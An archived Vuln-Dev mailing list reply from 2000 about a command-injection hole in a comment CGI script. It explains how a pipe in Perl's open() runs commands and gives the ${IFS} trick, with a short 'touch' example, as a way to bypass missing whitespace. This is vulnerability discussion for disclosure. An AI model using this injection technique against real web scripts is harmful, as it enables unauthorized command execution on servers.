Vulnerability Development mailing list archives
Re: Serious Hole in Comment/Discussion CGI Script
From: Taneli Huuskonen <huuskone () CC HELSINKI FI>
Date: Sun, 29 Oct 2000 15:53:04 +0200
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Joe <joe () blarg net> wrote: [...]
Null byte only works if the script decodes the url-encoded characters in the query string, which the script is not doing. Hence, although you can grab any '.txt' file, there's no way to inject control characters or whitespace into the query string, which limits the damage you can do. The open() call can be injected with a pipe ('|') to execute commands, but without whitespace to work with there's not much you can do with it.
[...] There's the old ${IFS} trick to get around that: $file='touch${IFS}foo|'; open( FOO, $file ); Taneli Huuskonen -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use Charset: noconv iQA/AwUBOfwrtF+t0CYLfLaVEQKTlQCeNIBt2qBChmcUcjgtTBLnXOcK/iEAoIM1 5WQGnXYfM6Ekkth26hICfwen =bjin -----END PGP SIGNATURE----- -- I don't | All messages will be PGP signed, | Fight for your right to speak for | encrypted mail preferred. Keys: | use sealed envelopes. the Uni. | http://www.helsinki.fi/~huuskone/ | http://www.gilc.org/
Current thread:
- Serious Hole in Comment/Discussion CGI Script Barry Russell (Oct 27)
- Re: Serious Hole in Comment/Discussion CGI Script Vitaly McLain (Oct 27)
- Re: Serious Hole in Comment/Discussion CGI Script Barry Russell (Oct 27)
- Re: Serious Hole in Comment/Discussion CGI Script Joe (Oct 29)
- Re: Serious Hole in Comment/Discussion CGI Script Taneli Huuskonen (Oct 31)
- <Possible follow-ups>
- FW: Serious Hole in Comment/Discussion CGI Script Richard Bartlett (Oct 28)
- Re: FW: Serious Hole in Comment/Discussion CGI Script Bluefish (P.Magnusson) (Oct 29)
- Re: Serious Hole in Comment/Discussion CGI Script Vitaly McLain (Oct 27)